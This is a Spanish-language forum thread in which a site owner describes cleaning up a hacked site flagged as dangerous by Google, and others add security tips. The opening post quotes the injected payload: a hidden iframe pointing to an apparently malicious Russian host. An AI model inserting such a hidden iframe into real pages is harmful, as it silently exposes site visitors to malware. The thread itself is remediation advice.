Cómo recuperar una web infectada y marcada como peligrosa

aldols Seguir

Gamma
Redactor
Verificación en dos pasos desactivada
Desde
5 Jun 2009
Mensajes
230
En dias pasados me paso algo muy raro... todos mis archivos index habian sido modificados. Aparecia un iframe misterioso como el siguiente..

HTML:
<iframe src="http://3e0.ru:8080/index.php" width=197 height=194 style="visibility: hidden"></iframe>

inmediatamente google reporto mi web y la marco como peligrosa...

¿pero como paso esto? mi equipo se infecto, un trojano habia sido la causa de que alguien supiera mi password de mi host...

¿que hacer?

1. haz un diagnostico de tu pagina
Insertar CODE, HTML o PHP:
http://google.com/safebrowsing/diagnostic?site=http://tusitio.com

2. Desde un equipo diferente al tuyo (uno que no este infectado) cambia el password de tu host y de tu blog

3. Edita los index (html y php) de cada una de las carpetas de tu blog. y elimina los iframes que aparecen.

4. O tambien lo que puedes hacer es volver a subir los archivos de tu blog o sitio a tu host.

5. Checa tu web en StopBadware.org - Badware Website Clearinghouse arrojara un diagnostico de tu web con un semaforo.. (rojo, amarillo o blanco)

6.- Si crees que ya quedo eliminado todo el malware de tu web entra a http://www.google.com/webmasters/tools/ y verifica que eres el dueño del sitio, y pide una revision de tu web por malware.

No pasaran mas de 24 horas, para que desaparezca el aviso de de que tu web es peligrosa.

Espero les haya servido, eso hice yo y todo sigue funcionando a la perfeccion.

saludos.
 

shadowblade

Delta
SEO
Verificación en dos pasos desactivada
Desde
11 Jul 2009
Mensajes
511
Por favor, ten en cuenta 📝 que si deseas hacer un trato 🤝 con este usuario, está baneado 🔒.
Muy útil, gracias por el aporte seguro le sera utial a alguno en alguna oportunidad, te ganaste tu dedo hulk
 

Luis

Zeta
Redactor
Verificación en dos pasos desactivada
Desde
20 Abr 2009
Mensajes
1.829
Increible colega, Muchisimas gracias por este mini-tutorial. La verdad nunca me ha pasado pero eh tenido amigos que si y si algun dia me llegara a pasar solo sigo estos pasos.

Muchisimas Gracias por el porte. Se agradece..
 

Facundo

Xi
Verificación en dos pasos desactivada
Desde
15 Abr 2009
Mensajes
4.445
Por favor, ten en cuenta 📝 que si deseas hacer un trato 🤝 con este usuario, está baneado 🔒.
Ta buena la info, y aunque a mi no me puede pasar, ta bueno para los que más con hosting propio.


Saludos!
 

Facundo

Xi
Verificación en dos pasos desactivada
Desde
15 Abr 2009
Mensajes
4.445
Por favor, ten en cuenta 📝 que si deseas hacer un trato 🤝 con este usuario, está baneado 🔒.
Blogger :D:D o por lo menos seria mucho más dificil pienso :p
 

Cristhian

VIP
Eta
SEO
Verificación en dos pasos activada
Verificado por Whatsapp
Verificado por Binance
Suscripción a IA
Desde
6 Abr 2009
Mensajes
1.346
Buenisimo amigo, es algo que hay que tomar en cuenta, alguna vez nos puede pasar, por eso debemos estar atentos :) Gracias!
 

Lexmax_ONE

Kappa
Diseñador
Verificación en dos pasos activada
¡Ha verificado su Paypal!
Desde
9 Jul 2009
Mensajes
2.633
Si que si, que bien que ya tengas esa experiencia jaja, :D eso de los iframes me ha dado muchos dolores de cabeza antes, suerte que pude ayudarte anteriormente, por que en mis tiempos nadie me ayudo y tuve que volverme loco para resolverlo
 

aldols

Gamma
Redactor
Verificación en dos pasos desactivada
Desde
5 Jun 2009
Mensajes
230
Si que si, que bien que ya tengas esa experiencia jaja, :D eso de los iframes me ha dado muchos dolores de cabeza antes, suerte que pude ayudarte anteriormente, por que en mis tiempos nadie me ayudo y tuve que volverme loco para resolverlo

la verdad yo no sabia ni que hacer... ya me habia desesperado.. :)
 

elias

Dseda
Social Media
Verificación en dos pasos desactivada
Verificado por Whatsapp
Desde
24 Dic 2009
Mensajes
1.010
no confio en ese dignostico de google, porque revise una pagina que mi antivirus si registra un troyano dentro de ella y google dice que no, que nada que ver que nunca han tenido nada malicioso
 

quality

Delta
SEO
Verificación en dos pasos desactivada
Verificado por Whatsapp
Desde
26 Nov 2009
Mensajes
677
Y habría que añadir:

- Ten siempre actualizado tu blog con la última versión.
- Pon una contraseña que tenga números, letras y símbolos y que no sea tu nombre. ;-)
- Ponte un antivirus y un antiespias en el pc.
- Cambia la contraseña alguna vez en la vida...

:santaropa:
 

¡Regístrate y comienza a ganar!

Beneficios

  • Gana dinero por participar
  • Gana dinero por recomendarnos
  • Descubre ofertas de empleo diariamente
  • Negocios seguros
  • ¡Información premium y más!

Acceder

¿Ya tienes una cuenta? Accede aquí

Arriba